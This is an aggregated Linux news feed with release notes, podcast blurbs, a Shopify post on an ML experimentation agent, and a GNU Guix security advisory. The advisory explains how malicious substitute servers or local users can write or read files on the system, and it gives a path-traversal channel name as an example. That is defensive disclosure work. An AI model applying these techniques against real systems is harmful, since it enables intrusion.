  - Recognise explicit shared library arguments when linking dependency
    libraries to a shared library, like exists when linking a program.

  - Support OpenMP with macOS clang by processing '-Xpreprocessor
    -fopenmp' as one token.

** Bug fixes:

  - Store cygpath file path conversions correctly for MSYS2 and MSVC.

  - Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.

  - Separate Objective C and C++ cache check for proper tagging support.

  - Fix in darwin to support values with spaces.

  - Limit the length of DLL name to 8.3 correctly to avoid corrupting a
    generated DLL on OS/2.

  - Remove unused variable on OS/2, which could cause issues with static
    library generation if defined.

  - Recognise more static linking options for Clang.

  - Fix emscripten CXX postdeps using non-PIC sysroot.

  - Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.

  - Avoid overlinking of dependency libraries on ELF systems.

  - Ensure old libraries are not archived.

** Changes in supported systems or compilers:

  - Add support for SlimCC compiler.

  - Add support for *-ironclad-gnu.


  • Noteworthy changes in release 2.6.0 (2025-09-18) [alpha]


** New features:

  - Add a new tool, libtool-next-version, to guide users through updating
    library versions.

  - Add tagging for Objective-C and Objective-C++, OBJC and OBJCXX.

  - Increase 5 digit limit on revision value for libraries to 19 digits,
    which is referencing Unix epoch time in nanoseconds.

  - Add configuration options to choose whether to use '-nostdlib' to let
    the compiler frontend decide what standard libraries to link when
    building C++ shared libraries and modules, --enable-cxx-stdlib and
    --disable-cxx-stdlib.

  - Allow statically linking GCC and Clang compiler support libraries
    into shared libraries.

  - Add linking clang_rt static archives compiler internal libraries by
    their absolute path.

  - Set 'mklink' as the symlinking tool for MSVC.

  - Pass '--target' architecture flag for Clang.

  - Support MSYS and MSYS2 file path conversions.

** Bug fixes:

  - Fix wrongly deduplicated compiler dependencies on linux.

  - Fix NetBSD postdeps for shared libraries.

  - Fix statically linking dependencies into shared C++ libraries when
    utilizing clang builtins or g++ options like, -static-libstdc++, by
    using a new configuration option, --enable-cxx-stdlib.

  - Ensure *-linux-mlibc host matches to mlibc userland rather than
    matching to GNU/Linux and similar userlands.

  - Fix hang with cmd.exe in MSYS.

  - For MSVC, fix mishandling compiler flags, symlinking, cl.exe '.exp'
    extension collision, symbol names, and numerous testsuite bugs.

  - Fix undeclared reference to access on Windows in libltdl.

  - Fix flang -Wl flags on FreeBSD.

  - Fix reordering '--as-needed' flag.

  - Fix libltdl early failures for multi-arch.

** Changes in supported systems or compilers:

  - Support additional Intel OneAPI compilers, 'icx', 'icpx', and 'ifx'.

  - Support ML64 (Microsoft Macro Assembler).

Enjoy!

  •  

Late Night Linux – Episode 394

Mozilla is paying for Firefox to be on the front of Wrexham football shirts, SCO vs IBM might not be dead after all, Red Hat will support RHEL forever if you are willing to pay, OpenMandriva discovers why distros need good governance, Félim awaits his statue, and a quick Kagi update.

 

 

News

Wrexham AFC and Firefox announce a multi-year, front-of-kit partnership

Zombie ‘who owns Unix?’ lawsuit comes alive again

Red Hat Enterprise Linux Long-Life Add-On: Your path to RHEL with no pre-determined end date

OpenMandriva Statement regarding attempted distribution sabotage

KDE at 30

 

 

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with some early episodes

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

screen @ Savannah: GNU Screen v.5.0.2 is released

Hi everyone,
I'm glad to announce the new release of GNU screen.

Screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells.

The 5.0.2 release includes the following changes to the previous release 5.0.1:

  • Add %* escape to output caret character literal ("^")
  • Add portable PAM conversation callback prototype (for Solaris)
  • Fixes:

 - type on big-endian systems
 - UTF-8 combining sequences
 - buffer overflow in SendCmdMessage()
 - detaching fail with empty terminfo and leave the session attached
 - eliminates the TOCTOU race
 - manpage fixes

Release (official tarball) will be available soon for download:
https://ftp.gn ... rg/gnu/screen/
Please report any bugs or regressions.
Thanks to everyone who contributed to this release.

Cheers,
Alex

  •  

Linux Dev Time – Episode 154

With an increase in the number of security bugs being disclosed irresponsibly, we dig into how the process should work, the differences between normal bugs and security bugs, the complexities of coordinating patches, the human issues involved, and more.

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 154

With an increase in the number of security bugs being disclosed irresponsibly, we dig into how the process should work, the differences between normal bugs and security bugs, the complexities of coordinating patches, the human issues involved, and more.

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

  •  

findutils @ Savannah: GNU findutils 4.11.0 released

This is to announce findutils-4.11.0, a stable release.

This release follows the recent POSIX (IEEE Std 1003.1-2024) changes,
especially to mention the new behavior of 'find -mount' vs. 'find -xdev',
as well as a lot of documentation improvements.

See the NEWS below for more details.

GNU findutils is a set of software tools for finding files that match
certain criteria and for performing various operations on them.
Findutils includes the programs "find", "xargs" and "locate".
More information about findutils is available at:
     https://www.gnu.o ... ftware/findutils/

Please report bugs and problems with this release via the the
GNU Savannah bug tracker:
     https://savannah. ... /?group=findutils

Please send general comments and feedback about the GNU findutils
package to the mailing list (<mailto:bug-findutils@gnu.org):
     https://lists.gnu ... nfo/bug-findutils

There have been 186 commits by 10 people in the - sigh - 25 months since 4.10.0:
     Bernhard Voelker (77)         Bjarni Ingi Gislason (1)
     Christoph Anton Mitterer (1)  Collin Funk (5)
     Dave (1)                      G. Branden Robinson (42)
     James Youngman (55)           Luk303241305241 Zaoral (1)
     danny mcClanahan (1)          raf (2)

This release was bootstrapped with the following tools:
      Autoconf 2.72
      Automake 1.17
      M4 1.4.19
      Gnulib v1.0-3131-ga575239e47

Please consider supporting the Free Software Foundation in its fund
raising appeal; see <https://www. ... .org/appeal/>.

Thanks to everyone who has contributed!

Have a nice day,
Bernhard Voelker & James Youngman [on behalf of the GNU findutils maintainers]

================================================================================

Here are the compressed sources:
     https://ftp.gnu.o ... ils-4.11.0.tar.xz

Here are the GPG detached signatures[*]:
     https://ftp.gnu.o ... 4.11.0.tar.xz.sig

Use a mirror for higher download bandwidth:
     http://www.gnu. ... /order/ftp.html

Here is the SHA256 checksum:

     bfd19cb06cc71f3352d567e90284d8cdac02ac89774bbeadf0b533b0c11432fd  findutils-4.11.0.tar.xz

[*] Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

gpg --verify findutils-4.11.0.tar.xz.sig

If that command fails because you don't have the required public key,
then run this command to import it:

gpg --keyserver keys.gnupg.net --recv-keys 0CF4E8D871593224842832B888DD9E08C5DDACB9

and rerun the 'gpg --verify' command.

================================================================================

NEWS

  • Noteworthy changes in release 4.11.0 (2026-07-11) [stable]


** Bug Fixes

   find no longer crashes when diagnosing a directory cycle (without a symlink
   being involved pointing to a parent directory).
   [Bug present since the FTS implementation.]

   'find -used' now behaves correctly on OpenBSD 7.8 with difftime(3) underflow
   bug in the C library (already fixed there) when the access time of a file is
   identical to its change time. [#68264]

   'find -ignore_readdir_race' now better handles races between FTS reading a
   directory and visiting its entries when the file or directory was meanwhile
   removed. [#45930]

   To fix a POSIX compatibility bug, -exec foo Z{} + is no longer a
   complete predicate, because '+' is only a terminator when it follows
   an argument which is exactly '{}'.  The findutils documentation
   already states this, and now find's behaviour matches the
   documentation. [#66365]

   'updatedb.sh' now properly handles the variables for the 'find' and 'frcode'
   utilities, and hence avoids command injection.

** Changes in find

   As announced since the release of 4.7.0 (2019) and mandated by POSIX 2024,
   the behaviour of the -mount option changed: while it was a mere alias for
   the -xdev option to prevent descending into directories of another device,
   the -mount option now makes find(1) ignore files on another device, i.e.,
   'find -mount' will skip the entry of active mount points already.
   Example, assuming the PROC filesystem is mounted on '/proc':
     $ find / -mount -path /proc -print
     $ find / -xdev -path /proc -print
     /proc
   [#54745]

   The actions -execdir and -okdir now refuse the '{}' replacement in the zeroth
   argument of the command to be run.  While POSIX allows this for -exec, this is
   deemed insecure as an attacker could influence which files could be found.

   'find -regex' with the default or the 'emacs' regextype now aligns better with
   Emacs behaviour, and therefore e.g. supports character classes:
     $ touch 123 && find -regex './12[[:digit:]]'
     ./123

   find now issues a warning when the punctuation operators '(', ')', '!' and ','
   are passed with a leading dash, e.g. '-!'.  Future releases will not accept
   that any more.  Accepting that was rather a bug "since the beginning".

** Improvements

   xargs now gives a better error diagnostic when executing the given command
   failed.

** Documentation Changes

   The most recent version of the POSIX standard (IEEE Std 1003.1-2024,
   also known as The Open Group Base Specifications, Issue 8) has
   standardised "find -print0" and "xargs -0".  Our documentation now
   points this out.  Similarly for 'find -iname'.

   The code example for "Finding the Shallowest Instance" in the Texinfo manual
   and the corresponding one in the EXAMPLES section in the find.1 man page have
   been fixed.  [#62259]

   Translators contributed numerous fixes for issues in the find.1 man page.

   The list of actions that suppress the default -print action has been
   supplemented with the missing '-print0' and '-fprint0' actions.

   The manual pages have been updated to give better and/or more
   consistent output with manpage formatters other than GNU roff.

** Translations

   Updated the following translations:
   Arabic, Brazilian Portuguese, Bulgarian, Chinese (simplified), Croatian,
   Czech, Dutch, Estonian, French, German, Indonesian, Korean, Polish,
   Portuguese, Romanian, Spanish, Swedish, Ukrainian.

** Future Changes

   A future release will remove the warning message find prints about
   the 2007 change in the meaning of "-perm /000".  Everybody who is
   likely to care probably knows about this change by now.

-eof-

  •  

2.5 Admins 307: One Big Pool

Follow-up on rebooting to update, portable power stations, glass storage, and objective news sources. Plus whether to use one ZFS pool per vdev, or just one large pool.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Native inotify in FreeBSD

 

Feedback

Anker SOLIX EV Charger Adapter (For F3000, J1722 only)

EcoFlow EV Charger to Portable Power Station Adaptor (SAE J1772 to 5P8 Port, 50A)

WattCycle First-to-Market: WattLINK – EcoFlow Delta 2/3 Series PPS E

 

 

Free consulting

We were asked about whether to use one ZFS pool per vdev, or just one large pool.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Building Autonomous ML Experimentation with Tangle and Tangent

By Alexey Volkov, Bo Li, Ben Chen, Maksym Yezhov, Pete Luferenko, and Volv Grebennikov – Shopify

Machine learning work is full of loops: form a hypothesis, build a pipeline, run it, read the metrics, adjust, repeat. Tangle is already where Shopify’s ML experiments run, giving engineers a shared platform to build and execute pipelines.

Tangent is an autonomous agent that orchestrates ML experimentation workflows on top of Tangle, deciding what to run, running it, and reporting back. Around Tangent we built a Linux-based platform for hosting these agents securely so they can persist, work remotely, and reach the services they need without ever holding a credential. This is done using containerized isolation, a certificate-issuing proxy, and per-instance persistent storage (details below).

What is Tangle?

Tangle is an open source, platform-agnostic ML experimentation platform with a powerful drag-and-drop visual editor. Users drag components onto a canvas, wire outputs to inputs to form a pipeline graph, and submit it for execution locally or in the cloud. A caching layer skips or reuses previously executed steps, including steps still in flight, so iteration is fast and cheap. All pipeline runs are stored forever (including graphs, components, and logs), making pipelines reproducible even after years have passed.

Because runs and caches are shared, teammates can inspect, copy, and modify each other’s pipelines in seconds, with no cloning a private notebook and hoping the environment matches. Tangle has similarities with other OSS tools like Airflow and Kubeflow Pipelines; its caching model and visual editor are what make fast experimentation loops possible. Any containerized CLI program written in any language can be used as a Tangle component, and those components exchange data as files in any format (CSV, Parquet, JSON, etc.).

Tangle composes components the way shell scripts, makefiles, and *nix pipes do. More information about Tangle is available at tangleml.com and you can immediately try it out.

Tangle's pipeline canvas and architecture
Tangle’s pipeline canvas and architecture.

What is Tangent?

Tangent is an autonomous ML engineering agent designed to accelerate your Tangle experimentation workflows. It follows the pattern Andrej Karpathy recently popularized as autoresearch. Tangent takes that idea from a single training script on one GPU to full experiment pipelines running on Tangle, with a fleet of specialized subagents, gated checkpoints, and persistent memory. You point it at a scenario, a model, a metric to improve, a dataset, and it iterates: it analyzes results, forms hypotheses, modifies pipelines, submits runs, monitors them, and synthesizes what it learned. How much you delegate is up to you. Tangent works interactively, so you can hand it a single step (build this component, debug this failed run, analyze these metrics), or you can hand off the entire loop with one command and let it run:

tangent auto
Screenshot of the eight-step loop progressing
Screenshot of the eight-step loop progressing.

Under the hood is an eight-step loop with gated checkpoints. The agent won’t advance until every item on a step’s checklist passes, and it reloads its instructions and context at each gate so it doesn’t drift over a long run. Memory is persistent and plain-text: a MEMORY.md holds the best-known configuration and hard-won lessons; daily session logs capture the play-by-play, and per-run learnings are archived to object storage.

The Tangent Skill

Tangent’s brain is a skill, written in Markdown. The entry point is a single SKILL.md, backed by a fleet of subagent skills: a researcher, a builder, a debugger, a reviewer, and more. Because skills are just files, they’re portable, reviewable in a pull request, and harness-agnostic, the same skill drives whichever coding agent you prefer.

That portability matters because Tangent runs on open agent harnesses instead of one proprietary client. To add a capability, you write a Markdown file and commit it. There is no binary to build or ship. Markdown was chosen deliberately over a config format or DSL: it’s diffable in a normal PR, requires no schema or parser to validate, and both humans and the coding agent read it natively. The skill file doubles as its own documentation.

# Tangent
A skill is just Markdown. This file is the entry point; each subagent is
its own Markdown file, loaded on demand.

## Commands
tangent <subagent>   Read agents/<subagent>.md and follow it.
tangent auto          Run the autonomous 8-step experiment loop.

## Subagents                Agent file
tangent builder             agents/builder.md
tangent debugger            agents/debugger.md
tangent researcher          agents/researcher.md
tangent reviewer             agents/reviewer.md
tangent reporter            agents/reporter.md

## Auto Mode - the loop
0 Initialize -> 1 Analyze -> 2 Hypothesize -> 3 Submit ->
4 Monitor -> 5 Evaluate -> 6 Synthesize -> 7 Decide -> (loop)

Each step has a gate. The agent won't advance until every item on the
step's checklist passes - and it re-reads its instructions at each
gate so it doesn't drift over a long run.

Tangent Agent Hosting Platform

Our Tangent Agent Hosting Platform helps users deploy persistent Tangent instances that communicate with Tangle, cloud providers, and other external services. Each Tangent instance is a multi-agent space: a Linux-based VM/container that can host multiple agentic apps (TUI, API, WebUI). Because every Tangent component runs as a standard Linux process inside a container, Tangent inherits mature Linux networking, storage, and isolation primitives instead of introducing a custom runtime. Instance data (like agent sessions and memories) is persisted across restarts. There are also cross-instance shared memories.

Agent Hosting architecture diagram
Agent Hosting architecture: Tangent Shell and Auth Proxy routing requests without exposing tokens.

Auth Proxy

Agents need access to services, but there is always a risk of agents reading the credentials and leaking them to AI providers. Tangent solves this by adding a system-wide proxy which lives in a separate container. The proxy intercepts and modifies HTTP requests coming from the agentic tools. Auth proxy automatically adds auth headers and can modify request URLs (e.g. redirect api.aicompany.com to some AI proxy). To modify HTTPS requests, auth proxy creates new SSL certificates on the fly. The agent container’s OS and programs are configured to trust those certificates via a generated certificate authority.

Implementation details

In the Kubernetes version, each instance is a StatefulSet: a container Pod running agents, apps, and proxies, backed by a per-instance PersistentVolume and a shared memory volume mount.

Tangent Shell

To work natively with Tangle, we built a custom Agent Host image. The Tangent Shell is an environment where agents run remotely, keep their memory and sessions across restarts, and keep working long after you close your laptop. Tangent Shell orchestrates multiple agents: it splits a request into slices, delegates them to parallel sub-agents, and coordinates results through a Prime agent that owns the session.

Tangent Shell is built to meet the ML expert’s needs. Each session boots pre-loaded with the Tangent skill toolkit and Tangle API tools, instructed to assist with Tangle-based ML experiments: building and optimizing ML training pipelines, testing hypotheses, ablation studies, hyperparameter optimization, etc. With the help of triggers (like webhooks, timers, and schedules), Tangent Shell is able to monitor pipeline executions and implement deep experimentation plans. The agent knows how to operate inside the rich UI, and how to render visual artifacts (Markdown, PNG, HTML).

The Shell is open source. Agent Bundles (packaged sets of prompts, tools, skills, workflows, and triggers) extend it without touching core code.

A real use case

We used Tangent to rebuild a large reranking model end to end. An engineer set the direction (which features to try, what training data to add) and reviewed results at each step. Tangent built, ran, and analyzed the experiments. Working through the loop, it tried a sequence of changes and measured each one against the previous best:

StepWhat the agent changedR@90% prec.R@95% prec.R@97% prec.
Previous pipelinePrior distillation training, standard features & data67.3%54.4%33.6%
+ Standardized pipelineMigrated onto a reproducible trainer (on par; enables fast iteration)69.5%51.9%35.2%
+ Richer product featuresAdded structured metadata, taxonomy, text descriptions, and predicted attributes (biggest single lift)71.3%58.7%48.5%
+ More & harder training dataAdded search-derived, sampled, and hard-negative pairs75.6%60.2%43.9%

Open source and contributing

Tangle, the Tangent skills, the Hosting Platform, and Tangent Shell are all released under Apache 2.0. Development happens in the open on GitHub, and the projects accept pull requests for new subagent skills, Agent Bundles, and core fixes. Tangle is maintained by its creator, Alexey Volkov, with Shopify as the project’s initial sponsor and infrastructure steward. If you build a subagent skill or Agent Bundle you think others would find useful, we welcome the PR.

Where to find Tangle and Tangent

The post Building Autonomous ML Experimentation with Tangle and Tangent appeared first on Linux.com.

  •  

In the news: KDE Linux Drops AUR; California May Exempt Linux from Its Age-…

In the news: KDE Linux Drops AUR; California May Exempt Linux from Its Age-Verification Law; Another Logic Bug Found in Linux Kernel; Ubuntu Core 26 Offers Game-Changing Enterprise Features; Flooding the Linux Kernel Security Mailing List; Top Priorities for Open Source Pros Seeking a New Job; Container-Based Fedora Hummingbird Designed for Agent-First Builders; and Linux Kernel Developers Considering a Kill Switch.

  •  

clamav-unofficial-sigs

  • Maggiori informazioni qui
  • Versione: 8.0.0

clamav-unofficial-sigs fornisce un modo semplice di scaricare, testare e aggiornare database verificati di terze parti forniti da Sanesecurity, FOXHOLE, OITC, Scamnailer, BOFHLAND, CRDF, Porcupine, Securiteinfo, MalwarePatrol, Yara-Rules Project, urlhaus, etc. Lo script genera e installa anche cron, logrotate, e i file man.

Aggiornamento

L'aggiornamento alla versione major 8.0.0 a partire dalla versione 7.x semplice:

clamav-unofficial-sigs.sh --upgrade
clamav-unofficial-sigs.sh --force

Controllare il file log /var/log/clamav-unofficial-sigs/clamav-unofficial-sigs.log alla fine.

  •  

Late Night Linux – Episode 393

A great example of accessibility features benefitting more than the target audience, a new version of the classic game Nethack, checking for bufferbloat, and Windows 10 limps on in discoveries. Then Félim’s question about the perceived value of open source goes in unexpected directions.

 

Discoveries

quick drag

Nethack 5

check your bufferbloat

opnsense help

Microsoft extends extended updates for Windows 10 in the most muted way imaginable

 

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with some early episodes

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

cssc @ Savannah: CSSC-1.5.0 released

This is to announce CSSC-1.5.0, a beta release.

There have been 424 commits by 2 people since 1.4.1.   Thanks to Greg A. Woods for helping to improve CSSC.

See the NEWS below for a brief summary.

===============================================================

Here is the GNU CSSC home page:
    https://gn ... rg/s/CSSC/

Here are the compressed sources and a GPG detached signature:
  https://alpha.gnu ... CSSC-1.5.0.tar.gz
  https://alpha.gnu ... -1.5.0.tar.gz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.o ... rg/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  File: CSSC-1.5.0.tar.gz
  SHA256 sum:   8483a31aac756955843ef574bed6fa9e052ea492217f3882033487d2704c6cf4
  SHA3-256 sum: c138c32cab373a51c32d2049064532ac24a6fa777b7edecabe4d605460018845

Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.

Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify CSSC-1.5.0.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096 2015-12-24 [SC]
        0CF4 E8D8 7159 3224 8428  32B8 88DD 9E08 C5DD ACB9
  uid   James Youngman <james@youngman.org>
  uid   James Youngman <jay@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key james@youngman.org

  gpg --recv-keys 88DD9E08C5DDACB9

  wget -q -O- 'https://savannah. ... SC&download=1'
| gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0.tar.gz.sig

This release is based on the CSSC git repository, available as

  git clone https://https.git ... .org/git/CSSC.git

with commit 77bdce39a09b9ff37831c4dd1cb0d4dd5967cb39 tagged as v1.5.0.

For a summary of changes and contributors, see:

  https://gitweb.gi ... shortlog;h=v1.5.0

or run this command from a git-cloned CSSC directory:

  git shortlog CSSC-1.4.1..v1.5.0

This release was bootstrapped with the following tools:
  Autoconf 2.72
  Automake 1.17
  Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df

NEWS

  • Noteworthy changes in release 1.5.0 (2026-07-05) [beta]


        * The test suite no longer depends on Python, so it should
work on older systems that have no Python 3 interpreter. While you can
build and test CSSC without Python, you do need a Python interpreter
to do some maintenance tasks (such as importing the "gnulib" code into
a git checkout).

        * Tolerate SCCS files in which file flags lack the space
separator which would normally come between the flag letter and the
associated value.

  • Noteworthy changes in release 1.5.0-rc3 (2026-06-14)


        * Some typos in error message have been fixed.

        * admin now supports combination of -r with -n as well as the
          portable combination of -r with -i.

        * Support "sccs sact"; the sact program already existed but
could not previously be invoked via the sccs wrapper.  Thanks to Greg
A. Woods for this improvement.

        * In some places we now prefer "grep -E" to "egrep" in order
to avoid a warning message from GNU grep.  Some very old versions of
Unix may not support this option.

        * Various C++ portability improvements.

        * Updated version of gnulib.

        * Updated version of googletest; this is now at the last
version at which it still supported building with Automake.

  • Noteworthy changes in release 1.5.0-rc2 (2024-05-13)


        * This release is more careful to detect I/O failures when
writing to stdout in prs and prt.

        * This release should build on more modern platforms.

        * The --with-googletest configure option is removed (now we
always use it).

        * Updated versions of gnulib and googletest.

  •  

Linux After Dark – Episode 125

Chris is struggling to decide which distro to install on his new work laptop, and he and Gary want to pick a new distro for the people they support. Plus Joe wonders what moving on from Xfce would look like.

 

 

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with some early episodes

 

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed.

  •  

GNU Guix: ‘guix substitute’ and ‘guix pull’ Vulnerabilities

Several security issues (CVE IDs pending) have been identified in guix substitute, a helper utility invoked by guix-daemon, which enable a variety of harmful activities including remote privilege escalation to the build daemon user, remote store corruption, and potentially local disclosure of sensitive files accessible to the build daemon user. All systems are affected, whether or not guix-daemon is running with root privileges; the harm that can be done when guix-daemon runs without root privileges is more limited. You are strongly advised to upgrade your daemon now (see instructions below), carefully considering whether to pass --no-substitutes to all guix commands when you do so (see note in Upgrading section).

The remote exploitation of guix substitute only requires that the vulnerable system attempt to download a binary substitute. Any configured substitute server, including ones discovered using guix-daemon's --discover option, can exploit this, and so can a man-in-the-middle (MITM), regardless of whether https is used in the substitute server urls.

The local exploitation of guix substitute only requires the ability to connect to guix-daemon's socket, which by default any user can do.

Separately, another security issue (CVE ID pending) was identified in guix pull and guix time-machine, which enables anyone who can control the channels file used by these commands to cause a file to be created or overwritten wherever the user running the command in question has permission to create them. This is possible regardless of whether the channels file is evaluated in a sandbox and whether the channels used are limited to those sharing an introduction with a trusted channel. Due to limitations on the content of the created or overwritten file, this primarily represents a denial-of-service risk, though in theory it could do more.

Update 2026-07-06: if you are using the unprivileged guix-daemon, as is the default on distros other than Guix System since version 1.5.0, and if you updated it between July 2nd and July 5th, you've probably been affected by this regression preventing substitutes from working. It is now fixed, but if you are stuck trying to upgrade, try passing --no-substitutes. If you can't reasonably upgrade without substitutes, you can either take your chances downgrading to the vulnerable guix-daemon and using it or try tinystar's workaround (doesn't apply to Guix on distributions other than Guix System).

Vulnerabilities

Three distinct vulnerabilities have been identified affecting guix substitute, with a fourth affecting guix pull and guix time-machine:

  1. (CVE assignment pending) The procedure that Guile code uses to unpack substitutes, restore-file in (guix serialization), was not hardened against malicious input, but it was called to extract the substitute being downloaded as it was being downloaded, rather than waiting until after the entire archive had been obtained and its hash had been verified. These facts together make it possible for any substitute server (or any entity that can impersonate one) to write arbitrary files to any place on an affected system that the daemon user has permission to write to. In the case of the daemon running as root, that includes /etc/passwd.

    To avoid depending on the X.509 Public Key Infrastructure, the procedure that fetches metadata about available substitutes (called narinfos), fetch-narinfos, does not verify server certificates, since the canonical parts of narinfos need to be signed anyway to be considered valid. Unfortunately the substitute URL is not one such canonical part, and so it can be replaced with an attacker-controlled URL. If the substitute downloaded doesn't match the signed hash in the narinfo, it will be rejected, but by then it is too late: the substitute was extracted as it was being downloaded, so the damage is already done.

    This means that even though download-nar, the procedure responsible for actually downloading the substitute, does itself verify server certificates, using https in substitute server urls cannot limit who can exploit this, as the certificate only needs to be appropriate for the attacker-controlled URL.

    restore-file is also used by other utilities, including guix offload, guix archive --extract, and guix challenge. These can all be exploited in the same way if untrusted input is given to them.

  2. (CVE assignment pending) The procedure that fetches metadata about available substitutes (called narinfos), fetch-narinfos in (guix substitutes), does not verify that the narinfo it got is the one it asked for, nor do any of its callers in (guix scripts substitute). Consequently, it is possible for a substitute server (or anyone who can impersonate one) to trick guix substitute into using any store item for which there is an authorized substitute as a substitute for any other store item for which there is an authorized substitute. The complete extent of harm that can be caused by this depends in part on what store items an authorized substitute server has signed or can be convinced to sign, but at minimum this can be used to cause outdated and insecure versions of software to be used.

  3. (CVE assignment pending) The implementation of guix substitute in (guix scripts substitute) permits file:// URIs to be used both for specifying substitute server URIs (where to look for narinfos) and for specifying within narinfos where to download the corresponding archive from. It does not distinguish between --substitute-urls passed on the guix-daemon command line and --substitute-urls passed on the guix command line (client-side), with the latter taking precedence over the former. Opening of these file:// URIs follows symbolic links. Consequently, an untrusted client may cause any file that the daemon can read to be read. If a given line of it doesn't look like a valid narinfo line (it uses recutils format), guix substitute may throw an exception, causing a backtrace containing that line to be passed through to the client. So, for example, a file containing a single line containing only a secret passphrase may have its contents revealed to any local user if the daemon user can read it.

    Additionally, when a file:// URI is used as the URI of a nar to download, it may be written to the store if it happens to be a valid nar ("normalized archive") as used by Guix and Nix. This is unlikely, though.

    In addition to possibly causing secrets to be disclosed, this can also be used to interfere with the reading of any file being read by any process that the daemon user could trace, through the use of files in /proc/PID/fd.

  4. (CVE assignment pending) The procedure which guix pull and guix time-machine use to authenticate channels, authenticate-channel in (guix channels), passed a cache key derived from the channel name to authenticate-repository in (guix git-authenticate). This cache key was used to determine a filename for storing previously-authenticated commit IDs in. If the channel name was of the form "../../../../newfile", it could have caused "newfile" to be created in the user's home directory. It may also have overwritten "newfile" if it already existed, but only if it already looked like a Scheme-syntax list of strings, since the contents would have to have first been read and processed before new contents would have been written.

    In the event that a write is performed, the output will only include a Scheme-syntax comment, newline, and list of hexadecimal strings corresponding to git commit identifiers. This makes it difficult to use for a practical attack other than a denial-of-service, but note that since it can target files in /proc, a sufficiently creative and informed attacker may be able to exploit this further.

    Realistically, this vulnerability can only be exploited when fetching remote channel files with the newly-added mechanism for doing so.

Mitigation

Vulnerabilities (1) and (2) can be mitigated against remote attackers by not using substitutes, either by passing --no-substitutes to guix-daemon or passing --no-substitutes to all guix commands. It's always possible to turn substitutes back on for an individual client, though, so this doesn't work to defend against a local attacker exploiting (1), (2), or (3), which cannot be mitigated and must be fixed by updating. Vulnerability (4) can be mitigated by not running guix pull or guix time-machine with an untrusted channels file.

A test for the presence of these vulnerabilities is available at the end of this post. One can run this code with:

guix repl -- guix-substitute-and-pull-vuln-check.scm

This will finish with a sequence of 4 lines, beginning with restore-file, fetch-narinfos, file-uris, and cache-key respectively, each followed by a colon, a space, and either vulnerable or not vulnerable depending on whether the running guix-daemon has the indicated vulnerability or not. If all 4 lines contain not vulnerable, then guix repl will exit with status code 0, otherwise it will exit with status code 1.

Some of the tests can fail to produce a result in some cases. In this case the output following the test name will start with error:. A test that fails to produce a result should be regarded as inconclusive.

The restore-file and fetch-narinfos tests may fail to produce a result if no substitutes are authorized, or if no authorized substitutes for the current guix's cfunge, hello, or sed packages can be accessed through any of the configured substitute urls. The restore-file test may fail to produce a result if cfunge is reachable from some garbage collection root, such as a profile. The cache-key test may fail to produce a result if network access to codeberg to fetch a small portion of the history of the guix-science channel is not available, which can be worked around by editing the script's definition of guix-science-url to be any URL (or a filename) at which a copy of the guix-science repository can be found.

Fixes

These security issues have been fixed by a series of 11 commits, starting with ed0a9721f8a20d6ddcf6a0495302f502b3f7bb17 and ending with 2ef8ed9f0df53bddf14bdecc2ea48c2d233213cc as part of pull request #9665. Users should make sure they have upgraded to commit 897832f374dcdc9eeaf19d01e70b9a92fccfc68c or any later commit to be protected from these vulnerabilities. Upgrade instructions are in the following section.

Fixing vulnerability (1) involved hardening restore-file so that it detects and rejects invalid directory entry names. Specifically, entry names must be unique, in strictly ascending order, not empty, not equal to "." or "..", and not containing "/" or null bytes. Additionally, procedures currently used as the #:dump-file argument to restore-file were modified to insist on creating the target file afresh and never follow symbolic links.

The inspiration for that last change came from looking at the implementation of nar-parsing in parse in nix/libutil/archive.cc, where it was determined that that implementation was not vulnerable, but was about as close to vulnerable as it could get without actually being vulnerable, only barely being saved by the fact that the filesystem primitives used all refused to follow symbolic links or accept an existing target (see this commit message for details). To avoid wasting another 3 hours trying to determine this the next time anyone tries looking at it with a critical eye, that implementation was also rewritten to be stricter and more obviously secure. It is perhaps not surprising that the same code led to CVE-2024-45593 in Nix when it was modified to use more lax filesystem primitives from std::filesystem.

Fixing vulnerability (2) involved modifying fetch-narinfos to not include a result if it didn't match what was asked for.

Fixing vulnerability (3) involved modifying (guix scripts substitute) to verify that all substitute urls from untrusted sources are not file:// urls, and that all nar urls in narinfos are not file:// urls (except when a special flag is set, which is only done in the test suite).

